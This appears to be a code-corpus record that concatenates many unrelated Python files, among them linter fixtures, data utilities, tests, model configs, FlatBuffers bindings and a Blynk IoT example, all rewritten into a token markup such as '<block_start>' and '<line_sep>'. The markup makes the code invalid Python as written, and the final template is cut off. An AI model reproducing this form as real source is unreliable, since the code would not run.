TEST_LIST4=["""a""" """b"""<concat>"""c""" """d"""]# [implicit-str-concat]
# The following shouldn't raise a warning because it is a function call
print('a' 'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'<concat>'ccc')<line_sep># The following shouldn't raise a warning because string literals are
# on different lines
TEST_LIST5=('a' 'b'<concat>'c')<line_sep># The following shouldn't raise a warning because of the escaped newline
TEST_LIST6=('bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb \
ccc')<line_sep># But we should emit when there is an actual juxtaposition
# +1: [implicit-str-concat]
TEST_LIST7=('a'<concat>'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb \
ccc')<line_sep># No warning for bytes
TEST_LIST8=[b'A'<concat>b'B']<line_sep>
|
# =========================================================================
# Copyright (C) 2021. Huawei Technologies Co., Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================
<import_stmt>h5py<import_stmt>os<import_stmt>logging<import_stmt>numpy<as>np<import_stmt>gc<import_stmt>glob<def_stmt>save_hdf5 data_array data_path key="data"<block_start>logging.info("Saving data to h5: "+data_path)<if_stmt><not>os.path.exists(os.path.dirname(data_path))<block_start>os.makedirs(os.path.dirname(data_path))<block_end><with_stmt>h5py.File(data_path 'w')<as>hf<block_start>hf.create_dataset(key data=data_array)<block_end><block_end><def_stmt>load_hdf5 data_path key=<none> verbose=<true><block_start><if_stmt>verbose<block_start>logging.info('Loading data from h5: '+data_path)<block_end><with_stmt>h5py.File(data_path 'r')<as>hf<block_start><if_stmt>key<is><not><none><block_start>data_array=hf[key][:]<block_end><else_stmt><block_start>data_array=hf[list(hf.keys())[0]][:]<block_end><block_end><return>data_array<block_end><def_stmt>split_train_test train_ddf=<none> valid_ddf=<none> test_ddf=<none> valid_size=0 test_size=0 split_type="sequential"<block_start>num_samples=len(train_ddf)<line_sep>train_size=num_samples<line_sep>instance_IDs=np.arange(num_samples)<if_stmt>split_type<eq>"random"<block_start>np.random.shuffle(instance_IDs)<block_end><if_stmt>test_size<g>0<block_start><if_stmt>test_size<l>1<block_start>test_size=int(num_samples<times>test_size)<block_end>train_size=train_size-test_size<line_sep>test_ddf=train_ddf.loc[instance_IDs[train_size:] :].reset_index()<line_sep>instance_IDs=instance_IDs[0:train_size]<block_end><if_stmt>valid_size<g>0<block_start><if_stmt>valid_size<l>1<block_start>valid_size=int(num_samples<times>valid_size)<block_end>train_size=train_size-valid_size<line_sep>valid_ddf=train_ddf.loc[instance_IDs[train_size:] :].reset_index()<line_sep>instance_IDs=instance_IDs[0:train_size]<block_end><if_stmt>valid_size<g>0<or>test_size<g>0<block_start>train_ddf=train_ddf.loc[instance_IDs :].reset_index()<block_end><return>train_ddf valid_ddf test_ddf<block_end><def_stmt>build_dataset feature_encoder train_data=<none> valid_data=<none> test_data=<none> valid_size=0 test_size=0 split_type="sequential" **kwargs<block_start>""" Build feature_map and transform h5 data """<line_sep># Load csv data
train_ddf=feature_encoder.read_csv(train_data)<line_sep>valid_ddf=feature_encoder.read_csv(valid_data)<if>valid_data<else><none><line_sep>test_ddf=feature_encoder.read_csv(test_data)<if>test_data<else><none><line_sep># Split data for train/validation/test
<if_stmt>valid_size<g>0<or>test_size<g>0<block_start>train_ddf,valid_ddf,test_ddf=split_train_test(train_ddf valid_ddf test_ddf valid_size test_size split_type)<block_end># fit and transform train_ddf
train_ddf=feature_encoder.preprocess(train_ddf)<line_sep>train_array=feature_encoder.fit_transform(train_ddf **kwargs)<line_sep>block_size=int(kwargs.get("data_block_size" 0))<if_stmt>block_size<g>0<block_start>block_id=0<for_stmt>idx range(0 len(train_array) block_size)<block_start>save_hdf5(train_array[idx:(idx+block_size) :] os.path.join(feature_encoder.data_dir 'train_part_{}.h5'.format(block_id)))<line_sep>block_id<augadd>1<block_end><block_end><else_stmt><block_start>save_hdf5(train_array os.path.join(feature_encoder.data_dir 'train.h5'))<block_end><del_stmt>train_array train_ddf<line_sep>gc.collect()<line_sep># Transfrom valid_ddf
<if_stmt>valid_ddf<is><not><none><block_start>valid_ddf=feature_encoder.preprocess(valid_ddf)<line_sep>valid_array=feature_encoder.transform(valid_ddf)<if_stmt>block_size<g>0<block_start>block_id=0<for_stmt>idx range(0 len(valid_array) block_size)<block_start>save_hdf5(valid_array[idx:(idx+block_size) :] os.path.join(feature_encoder.data_dir 'valid_part_{}.h5'.format(block_id)))<line_sep>block_id<augadd>1<block_end><block_end><else_stmt><block_start>save_hdf5(valid_array os.path.join(feature_encoder.data_dir 'valid.h5'))<block_end><del_stmt>valid_array valid_ddf<line_sep>gc.collect()<block_end># Transfrom test_ddf
<if_stmt>test_ddf<is><not><none><block_start>test_ddf=feature_encoder.preprocess(test_ddf)<line_sep>test_array=feature_encoder.transform(test_ddf)<if_stmt>block_size<g>0<block_start>block_id=0<for_stmt>idx range(0 len(test_array) block_size)<block_start>save_hdf5(test_array[idx:(idx+block_size) :] os.path.join(feature_encoder.data_dir 'test_part_{}.h5'.format(block_id)))<line_sep>block_id<augadd>1<block_end><block_end><else_stmt><block_start>save_hdf5(test_array os.path.join(feature_encoder.data_dir 'test.h5'))<block_end><del_stmt>test_array test_ddf<line_sep>gc.collect()<block_end>logging.info("Transform csv data to h5 done.")<block_end><def_stmt>h5_generator feature_map stage="both" train_data=<none> valid_data=<none> test_data=<none> batch_size=32 shuffle=<true> **kwargs<block_start>logging.info("Loading data...")<if_stmt>kwargs.get("data_block_size" 0)<g>0<block_start><import_from_stmt>..pytorch.data_generator DataBlockGenerator<as>DataGenerator<block_end><else_stmt><block_start><import_from_stmt>..pytorch.data_generator DataGenerator<block_end>train_gen=<none><line_sep>valid_gen=<none><line_sep>test_gen=<none><if_stmt>stage<in>["both" "train"]<block_start>train_blocks=glob.glob(train_data)<line_sep>valid_blocks=glob.glob(valid_data)<assert_stmt>len(train_blocks)<g>0<and>len(valid_blocks)<g>0 "invalid data files or paths."<if_stmt>len(train_blocks)<g>1<block_start>train_blocks.sort(key=<lambda>x:int(x.split("_")[-1].split(".")[0]))<block_end><if_stmt>len(valid_blocks)<g>1<block_start>valid_blocks.sort(key=<lambda>x:int(x.split("_")[-1].split(".")[0]))<block_end>train_gen=DataGenerator(train_blocks batch_size=batch_size shuffle=shuffle **kwargs)<line_sep>valid_gen=DataGenerator(valid_blocks batch_size=batch_size shuffle=<false> **kwargs)<line_sep>logging.info("Train samples: total/{:d}, pos/{:.0f}, neg/{:.0f}, ratio/{:.2f}%, blocks/{:.0f}".format(train_gen.num_samples train_gen.num_positives train_gen.num_negatives 100.<times>train_gen.num_positives/train_gen.num_samples train_gen.num_blocks))<line_sep>logging.info("Validation samples: total/{:d}, pos/{:.0f}, neg/{:.0f}, ratio/{:.2f}%, blocks/{:.0f}".format(valid_gen.num_samples valid_gen.num_positives valid_gen.num_negatives 100.<times>valid_gen.num_positives/valid_gen.num_samples valid_gen.num_blocks))<if_stmt>stage<eq>"train"<block_start>logging.info("Loading train data done.")<line_sep><return>train_gen valid_gen<block_end><block_end><if_stmt>stage<in>["both" "test"]<block_start>test_blocks=glob.glob(test_data)<if_stmt>len(test_blocks)<g>0<block_start><if_stmt>len(test_blocks)<g>1<block_start>test_blocks.sort(key=<lambda>x:int(x.split("_")[-1].split(".")[0]))<block_end>test_gen=DataGenerator(test_blocks batch_size=batch_size shuffle=<false> **kwargs)<line_sep>logging.info("Test samples: total/{:d}, pos/{:.0f}, neg/{:.0f}, ratio/{:.2f}%, blocks/{:.0f}".format(test_gen.num_samples test_gen.num_positives test_gen.num_negatives 100.<times>test_gen.num_positives/test_gen.num_samples test_gen.num_blocks))<block_end><if_stmt>stage<eq>"test"<block_start>logging.info("Loading test data done.")<line_sep><return>test_gen<block_end><block_end>logging.info("Loading data done.")<line_sep><return>train_gen valid_gen test_gen<block_end><def_stmt>tfrecord_generator <block_start><raise>NotImplementedError()<block_end>
|
<import_from_stmt>dataclasses dataclass field<import_from_stmt>typing Optional<import_from_stmt>mashumaro DataClassDictMixin field_options<import_from_stmt>mashumaro.config TO_DICT_ADD_BY_ALIAS_FLAG TO_DICT_ADD_OMIT_NONE_FLAG BaseConfig <line_sep>@dataclass<class_stmt>A(DataClassDictMixin)<block_start>x:Optional[int]=<none><class_stmt>Config(BaseConfig)<block_start>aliases={"x":"x_alias"}<line_sep>code_generation_options=[TO_DICT_ADD_OMIT_NONE_FLAG TO_DICT_ADD_BY_ALIAS_FLAG ]<block_end><block_end>@dataclass<class_stmt>B(DataClassDictMixin)<block_start>a:Optional[A]=<none><class_stmt>Config(BaseConfig)<block_start>aliases={"a":"a_alias"}<line_sep>code_generation_options=[TO_DICT_ADD_OMIT_NONE_FLAG TO_DICT_ADD_BY_ALIAS_FLAG ]<block_end><block_end><def_stmt>test_passing_flags_if_parent_has_them <block_start>@dataclass<class_stmt>WithFlags(DataClassDictMixin)<block_start>b:B<class_stmt>Config(BaseConfig)<block_start>code_generation_options=[TO_DICT_ADD_OMIT_NONE_FLAG TO_DICT_ADD_BY_ALIAS_FLAG ]<block_end><block_end><assert_stmt>WithFlags.from_dict({"b":{"a":{"x":<none>}}})<eq>WithFlags(b=B(a=<none>))<line_sep>obj=WithFlags.from_dict({"b":{"a_alias":{"x":<none>}}})<assert_stmt>obj<eq>WithFlags(b=B(a=A(x=<none>)))<assert_stmt>obj.to_dict()<eq>{"b":{"a":{"x":<none>}}}<assert_stmt>obj.to_dict(by_alias=<true>)<eq>{"b":{"a_alias":{"x_alias":<none>}}}<assert_stmt>obj.to_dict(by_alias=<true> omit_none=<true>)<eq>{"b":{"a_alias":{}}}<block_end><def_stmt>test_passing_flags_if_parent_does_not_have_them <block_start>@dataclass<class_stmt>WithoutFlags(DataClassDictMixin)<block_start>b:B<block_end><assert_stmt>WithoutFlags.from_dict({"b":{"a":{"x":<none>}}})<eq>WithoutFlags(b=B(a=<none>))<line_sep>obj=WithoutFlags.from_dict({"b":{"a_alias":{"x":<none>}}})<assert_stmt>obj<eq>WithoutFlags(b=B(a=A(x=<none>)))<assert_stmt>obj.to_dict()<eq>{"b":{"a":{"x":<none>}}}<block_end>
|
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2022 Apple Inc. All Rights Reserved.
#
<import_from_stmt>typing Dict<import_from_stmt>utils logger<def_stmt>get_configuration opts<arrow>Dict<block_start>mode=getattr(opts "model.classification.mit.mode" "small")<if_stmt>mode<is><none><block_start>logger.error("Please specify mode")<block_end>head_dim=getattr(opts "model.classification.mit.head_dim" <none>)<line_sep>num_heads=getattr(opts "model.classification.mit.number_heads" 4)<if_stmt>head_dim<is><not><none><block_start><if_stmt>num_heads<is><not><none><block_start>logger.error("--model.classification.mit.head-dim and --model.classification.mit.number-heads "<concat>"are mutually exclusive.")<block_end><block_end><elif_stmt>num_heads<is><not><none><block_start><if_stmt>head_dim<is><not><none><block_start>logger.error("--model.classification.mit.head-dim and --model.classification.mit.number-heads "<concat>"are mutually exclusive.")<block_end><block_end>mode=mode.lower()<if_stmt>mode<eq>"xx_small"<block_start>mv2_exp_mult=2<line_sep>config={"layer1":{"out_channels":16 "expand_ratio":mv2_exp_mult "num_blocks":1 "stride":1 "block_type":"mv2" } "layer2":{"out_channels":24 "expand_ratio":mv2_exp_mult "num_blocks":3 "stride":2 "block_type":"mv2" } "layer3":{# 28x28
"out_channels":48 "transformer_channels":64 "ffn_dim":128 "transformer_blocks":2 "patch_h":2 # 8,
"patch_w":2 # 8,
"stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "layer4":{# 14x14
"out_channels":64 "transformer_channels":80 "ffn_dim":160 "transformer_blocks":4 "patch_h":2 # 4,
"patch_w":2 # 4,
"stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "layer5":{# 7x7
"out_channels":80 "transformer_channels":96 "ffn_dim":192 "transformer_blocks":3 "patch_h":2 "patch_w":2 "stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "last_layer_exp_factor":4 }<block_end><elif_stmt>mode<eq>"x_small"<block_start>mv2_exp_mult=4<line_sep>config={"layer1":{"out_channels":32 "expand_ratio":mv2_exp_mult "num_blocks":1 "stride":1 "block_type":"mv2" } "layer2":{"out_channels":48 "expand_ratio":mv2_exp_mult "num_blocks":3 "stride":2 "block_type":"mv2" } "layer3":{# 28x28
"out_channels":64 "transformer_channels":96 "ffn_dim":192 "transformer_blocks":2 "patch_h":2 "patch_w":2 "stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "layer4":{# 14x14
"out_channels":80 "transformer_channels":120 "ffn_dim":240 "transformer_blocks":4 "patch_h":2 "patch_w":2 "stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "layer5":{# 7x7
"out_channels":96 "transformer_channels":144 "ffn_dim":288 "transformer_blocks":3 "patch_h":2 "patch_w":2 "stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "last_layer_exp_factor":4 }<block_end><elif_stmt>mode<eq>"small"<block_start>mv2_exp_mult=4<line_sep>config={"layer1":{"out_channels":32 "expand_ratio":mv2_exp_mult "num_blocks":1 "stride":1 "block_type":"mv2" } "layer2":{"out_channels":64 "expand_ratio":mv2_exp_mult "num_blocks":3 "stride":2 "block_type":"mv2" } "layer3":{# 28x28
"out_channels":96 "transformer_channels":144 "ffn_dim":288 "transformer_blocks":2 "patch_h":2 "patch_w":2 "stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "layer4":{# 14x14
"out_channels":128 "transformer_channels":192 "ffn_dim":384 "transformer_blocks":4 "patch_h":2 "patch_w":2 "stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "layer5":{# 7x7
"out_channels":160 "transformer_channels":240 "ffn_dim":480 "transformer_blocks":3 "patch_h":2 "patch_w":2 "stride":2 "mv_expand_ratio":mv2_exp_mult "head_dim":head_dim "num_heads":num_heads "block_type":"mobilevit" } "last_layer_exp_factor":4 }<block_end><else_stmt><block_start><raise>NotImplementedError<block_end><return>config<block_end>
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
<import_stmt>aiounittest<import_from_stmt>botbuilder.dialogs DialogSet<import_from_stmt>botbuilder.core MemoryStorage ConversationState<class_stmt>PromptValidatorContextTests(aiounittest.AsyncTestCase)<block_start><async_keyword><def_stmt>test_prompt_validator_context_end self<block_start>storage=MemoryStorage()<line_sep>conv=ConversationState(storage)<line_sep>accessor=conv.create_property("dialogstate")<line_sep>dialog_set=DialogSet(accessor)<line_sep>self.assertNotEqual(dialog_set <none>)<line_sep># TODO: Add TestFlow
<block_end><def_stmt>test_prompt_validator_context_retry_end self<block_start>storage=MemoryStorage()<line_sep>conv=ConversationState(storage)<line_sep>accessor=conv.create_property("dialogstate")<line_sep>dialog_set=DialogSet(accessor)<line_sep>self.assertNotEqual(dialog_set <none>)<line_sep># TODO: Add TestFlow
<block_end># All require Testflow!
<block_end>
|
<import_stmt>sys<import_stmt>fnmatch<import_stmt>os<line_sep>collect_ignore=["setup.py"]<if_stmt>sys.version_info<l>(3 5)<block_start><for_stmt>root,dirnames,filenames os.walk('.')<block_start><for_stmt>filename fnmatch.filter(filenames '*aio.py')<block_start>collect_ignore.append(os.path.join(root filename))<block_end><block_end><block_end>
|
<import_from_stmt>abc abstractmethod ABC<import_from_stmt>dataclasses dataclass<import_from_stmt>enum Enum<import_from_stmt>typing Any Mapping Optional<import_stmt>aiohttp<import_stmt>ujson<class_stmt>RESTMethod(Enum)<block_start>GET="GET"<line_sep>POST="POST"<line_sep>PUT="PUT"<line_sep>DELETE="DELETE"<def_stmt>__str__ self<block_start>obj_str=repr(self)<line_sep><return>obj_str<block_end><def_stmt>__repr__ self<block_start><return>self.value<block_end><block_end>@dataclass<class_stmt>RESTRequest<block_start>method:RESTMethod<line_sep>url:Optional[str]=<none><line_sep>params:Optional[Mapping[str str]]=<none><line_sep>data:Any=<none><line_sep>headers:Optional[Mapping[str str]]=<none><line_sep>is_auth_required:bool=<false><line_sep>throttler_limit_id:Optional[str]=<none><block_end>@dataclass<class_stmt>EndpointRESTRequest(RESTRequest ABC)<block_start>"""This request class enable the user to provide either a complete URL or simply an endpoint.
The endpoint is concatenated with the return value of `base_url`. It can handle endpoints supplied both as
`"endpoint"` and `"/endpoint"`. It also provides the necessary checks to ensure a valid URL can be constructed.
"""<line_sep>endpoint:Optional[str]=<none><def_stmt>__post_init__ self<block_start>self._ensure_url()<line_sep>self._ensure_params()<line_sep>self._ensure_data()<block_end>@property@abstractmethod<def_stmt>base_url self<arrow>str<block_start><ellipsis><block_end><def_stmt>_ensure_url self<block_start><if_stmt>self.url<is><none><and>self.endpoint<is><none><block_start><raise>ValueError("Either the full url or the endpoint must be specified.")<block_end><if_stmt>self.url<is><none><block_start><if_stmt>self.endpoint.startswith("/")<block_start>self.url=f"{self.base_url}{self.endpoint}"<block_end><else_stmt><block_start>self.url=f"{self.base_url}/{self.endpoint}"<block_end><block_end><block_end><def_stmt>_ensure_params self<block_start><if_stmt>self.method<eq>RESTMethod.POST<block_start><if_stmt>self.params<is><not><none><block_start><raise>ValueError("POST requests should not use `params`. Use `data` instead.")<block_end><block_end><block_end><def_stmt>_ensure_data self<block_start><if_stmt>self.method<eq>RESTMethod.POST<block_start><if_stmt>self.data<is><not><none><block_start>self.data=ujson.dumps(self.data)<block_end><block_end><elif_stmt>self.data<is><not><none><block_start><raise>ValueError("The `data` field should be used only for POST requests. Use `params` instead.")<block_end><block_end><block_end>@dataclass(init=<false>)<class_stmt>RESTResponse<block_start>url:str<line_sep>method:RESTMethod<line_sep>status:int<line_sep>headers:Optional[Mapping[str str]]<def_stmt>__init__ self aiohttp_response:aiohttp.ClientResponse<block_start>self._aiohttp_response=aiohttp_response<block_end>@property<def_stmt>url self<arrow>str<block_start>url_str=str(self._aiohttp_response.url)<line_sep><return>url_str<block_end>@property<def_stmt>method self<arrow>RESTMethod<block_start>method_=RESTMethod[self._aiohttp_response.method.upper()]<line_sep><return>method_<block_end>@property<def_stmt>status self<arrow>int<block_start>status_=int(self._aiohttp_response.status)<line_sep><return>status_<block_end>@property<def_stmt>headers self<arrow>Optional[Mapping[str str]]<block_start>headers_=self._aiohttp_response.headers<line_sep><return>headers_<block_end><async_keyword><def_stmt>json self<arrow>Any<block_start>json_=<await>self._aiohttp_response.json()<line_sep><return>json_<block_end><async_keyword><def_stmt>text self<arrow>str<block_start>text_=<await>self._aiohttp_response.text()<line_sep><return>text_<block_end><block_end>@dataclass<class_stmt>WSRequest<block_start>payload:Mapping[str Any]<line_sep>throttler_limit_id:Optional[str]=<none><line_sep>is_auth_required:bool=<false><block_end>@dataclass<class_stmt>WSResponse<block_start>data:Any<block_end>
|
# -*- coding: utf-8 -*-
<import_from_future_stmt> unicode_literals<import_from_stmt>django.db migrations models<import_stmt>django.db.models.deletion<import_from_stmt>django.conf settings<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('operations' '0007_auto_20170328_1728') ]<line_sep>operations=[migrations.AlterField(model_name='operation' name='assignee' field=models.ForeignKey(verbose_name='assignee' blank=<true> to=settings.AUTH_USER_MODEL null=<true> related_name='operations' on_delete=django.db.models.deletion.PROTECT) ) ]<block_end>
|
<import_stmt>lldb<import_from_stmt>lldbsuite.test.decorators *<import_from_stmt>lldbsuite.test.lldbtest *<import_from_stmt>lldbsuite.test lldbutil<class_stmt>TestCase(TestBase)<block_start>mydir=TestBase.compute_mydir(__file__)<line_sep>@skipUnlessDarwin# LLDB ends up calling the user-defined function (but at least doesn't
# crash).
@expectedFailureDarwin<def_stmt>test self<block_start>"""
Tests LLDB's behaviour if the user defines their own conflicting
objc_copyRealizedClassList_nolock function.
"""<line_sep>self.build()<line_sep>lldbutil.run_to_source_breakpoint(self "// break here" lldb.SBFileSpec("main.m"))<line_sep># Get the (dynamic) type of our 'id' variable so that our Objective-C
# runtime information is updated.
str_val=self.expect_expr("custom_class")<line_sep>dyn_val=str_val.GetDynamicValue(lldb.eDynamicCanRunTarget)<line_sep># We should have retrieved the proper class list even in presence of
# the user-defined function.
self.assertEqual(dyn_val.GetTypeName() "CustomClass *")<block_end><block_end>
|
<import_from_stmt>.website make_website_files<line_sep>
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017-2020 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_stmt>importlib<import_stmt>os<line_sep>COLORS_CONFIG='''\
? !!python/tuple
- 0
- 100
- 80
: Foo
? !!python/tuple
- 25
- 20
- 20
: Bar
? !!python/tuple
- 25
- 230
- 140
: Baz
'''<line_sep>EXPECTED_COLORS={'style.color_palette_categorical':'My Palette' 'style.color_palette_sequential':'Midnight Orange Sequential' 'style.color_palette_diverging':'Midnight Orange Diverging' 'style.color_palette_accent':'My Palette' 'style.color_palette_accent_default_color':'light grey' }<def_stmt>test_colors_config monkeypatch tmpdir<block_start>f=tmpdir.join('colors_config.yaml')<line_sep>f.write(COLORS_CONFIG)<line_sep># XXX (dano): CHARTIFY_CONFIG_DIR must end with /
monkeypatch.setenv('CHARTIFY_CONFIG_DIR' os.path.join(str(tmpdir) ''))<line_sep># reload modules to reload configuration
<import_stmt>chartify._core.options<import_stmt>chartify._core.colors<import_stmt>chartify._core.style<line_sep>importlib.reload(chartify._core.options)<line_sep>importlib.reload(chartify._core.colors)<import_stmt>chartify._core.colour<as>colour<assert_stmt>colour.COLOR_NAME_TO_RGB['foo']<eq>(0 100 80)<assert_stmt>colour.COLOR_NAME_TO_RGB['bar']<eq>(25 20 20)<assert_stmt>colour.COLOR_NAME_TO_RGB['baz']<eq>(25 230 140)<block_end>
|
#encoding:utf-8
subreddit='india'<line_sep>t_channel='@r_indiaa'<def_stmt>send_post submission r2t<block_start><return>r2t.send_simple(submission)<block_end>
|
# automatically generated by the FlatBuffers compiler, do not modify
# namespace:
<import_stmt>flatbuffers<import_from_stmt>flatbuffers.compat import_numpy<line_sep>np=import_numpy()<class_stmt>Package(object)<block_start>__slots__=['_tab']<line_sep>@classmethod<def_stmt>GetRootAs cls buf offset=0<block_start>n=flatbuffers.encode.Get(flatbuffers.packer.uoffset buf offset)<line_sep>x=Package()<line_sep>x.Init(buf n+offset)<line_sep><return>x<block_end>@classmethod<def_stmt>GetRootAsPackage cls buf offset=0<block_start>"""This method is deprecated. Please switch to GetRootAs."""<line_sep><return>cls.GetRootAs(buf offset)<block_end># Package
<def_stmt>Init self buf pos<block_start>self._tab=flatbuffers.table.Table(buf pos)<block_end># Package
<def_stmt>Type self<block_start>o=flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))<if_stmt>o<ne>0<block_start><return>self._tab.Get(flatbuffers.number_types.Int8Flags o+self._tab.Pos)<block_end><return>0<block_end># Package
<def_stmt>Name self<block_start>o=flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))<if_stmt>o<ne>0<block_start><return>self._tab.String(o+self._tab.Pos)<block_end><return><none><block_end># Package
<def_stmt>Sid self<block_start>o=flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))<if_stmt>o<ne>0<block_start><return>self._tab.Get(flatbuffers.number_types.Uint64Flags o+self._tab.Pos)<block_end><return>0<block_end># Package
<def_stmt>InitPayload self<block_start>o=flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))<if_stmt>o<ne>0<block_start>x=self._tab.Indirect(o+self._tab.Pos)<import_from_stmt>Serialized Serialized<line_sep>obj=Serialized()<line_sep>obj.Init(self._tab.Bytes x)<line_sep><return>obj<block_end><return><none><block_end><block_end><def_stmt>Start builder<block_start>builder.StartObject(4)<block_end><def_stmt>PackageStart builder<block_start>"""This method is deprecated. Please switch to Start."""<line_sep><return>Start(builder)<block_end><def_stmt>AddType builder type<block_start>builder.PrependInt8Slot(0 type 0)<block_end><def_stmt>PackageAddType builder type<block_start>"""This method is deprecated. Please switch to AddType."""<line_sep><return>AddType(builder type)<block_end><def_stmt>AddName builder name<block_start>builder.PrependUOffsetTRelativeSlot(1 flatbuffers.number_types.UOffsetTFlags.py_type(name) 0)<block_end><def_stmt>PackageAddName builder name<block_start>"""This method is deprecated. Please switch to AddName."""<line_sep><return>AddName(builder name)<block_end><def_stmt>AddSid builder sid<block_start>builder.PrependUint64Slot(2 sid 0)<block_end><def_stmt>PackageAddSid builder sid<block_start>"""This method is deprecated. Please switch to AddSid."""<line_sep><return>AddSid(builder sid)<block_end><def_stmt>AddInitPayload builder initPayload<block_start>builder.PrependUOffsetTRelativeSlot(3 flatbuffers.number_types.UOffsetTFlags.py_type(initPayload) 0)<block_end><def_stmt>PackageAddInitPayload builder initPayload<block_start>"""This method is deprecated. Please switch to AddInitPayload."""<line_sep><return>AddInitPayload(builder initPayload)<block_end><def_stmt>End builder<block_start><return>builder.EndObject()<block_end><def_stmt>PackageEnd builder<block_start>"""This method is deprecated. Please switch to End."""<line_sep><return>End(builder)<block_end>
|
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
<import_stmt>os<import_stmt>uuid<import_from_stmt>mindspore.mindrecord FileWriter FileReader<import_from_stmt>utils get_data<line_sep>MINDRECORD_FILE_NAME="./imagenet.mindrecord"<def_stmt>write_mindrecord_tutorial <block_start>writer=FileWriter(MINDRECORD_FILE_NAME)<line_sep>data=get_data("./ImageNetDataSimulation")<line_sep>schema_json={"file_name":{"type":"string"} "label":{"type":"int64"} "data":{"type":"bytes"}}<line_sep>writer.add_schema(schema_json "img_schema")<line_sep>writer.add_index(["file_name" "label"])<line_sep>writer.write_raw_data(data)<line_sep>writer.commit()<line_sep>reader=FileReader(MINDRECORD_FILE_NAME)<line_sep>count=0<for_stmt>index,x enumerate(reader.get_next())<block_start><assert_stmt>len(x)<eq>3<line_sep>count=count+1<line_sep># print("#item {}: {}".format(index, x))
<block_end><assert_stmt>count<eq>20<line_sep>reader.close()<block_end><if_stmt>__name__<eq>'__main__'<block_start>write_mindrecord_tutorial()<line_sep>os.remove(MINDRECORD_FILE_NAME)<line_sep>os.remove(MINDRECORD_FILE_NAME+".db")<block_end>
|
"""
Blynk is a platform with iOS and Android apps to control
Arduino, Raspberry Pi and the likes over the Internet.
You can easily build graphic interfaces for all your
projects by simply dragging and dropping widgets.
Downloads, docs, tutorials: http://www.blynk.cc
Sketch generator: http://examples.blynk.cc
Blynk community: http://community.blynk.cc
Social networks: http://www.fb.com/blynkapp
http://twitter.com/blynk_app
This example shows how to get UTC time and Timezone info
"""<import_stmt>BlynkLib<import_stmt>time<line_sep>BLYNK_AUTH='<PASSWORD>AuthToken'<line_sep># Initialize Blynk
blynk=BlynkLib.Blynk(BLYNK_AUTH)<line_sep>@blynk.on("connected")<def_stmt>blynk_connected ping<block_start>print('Blynk ready. Ping:' ping 'ms')<line_sep>blynk.send_internal("utc" "time")<line_sep>blynk.send_internal("utc" "tz_name")<block_end>@blynk.on("disconnected")<def_stmt>blynk_disconnected <block_start>print('Blynk disconnected')<block_end>@blynk.on("internal:utc")<def_stmt>on_utc value<block_start><if_stmt>value[0]<eq>"time"<block_start>ts=int(value[1])<floordiv>1000<line_sep># on embedded systems, you may need to subtract time difference between 1970 and 2000
#ts -= 946684800
tm=time.gmtime(ts)<line_sep>print("UTC time: " time.asctime(tm))<block_end><elif_stmt>value[0]<eq>"tz_name"<block_start>print("Timezone: " value[1])<block_end><block_end><while_stmt><true><block_start>blynk.run()<block_end>
|
<import_from_future_stmt> print_function<import_stmt>os<import_stmt>re<import_stmt>subprocess<import_stmt>sys<line_sep>SCRIPT_NAME='script{sys.version_info[0]}{sys.version_info[1]}.rsp'<line_sep>TEMPLATE=r'''python {sys.version_info[0]}.{sys.version_info[1]} {sys.executable}
logs logs
module * {sys.prefix}\Lib\site-packages\{module}\**\*.py
enqueue *
analyze
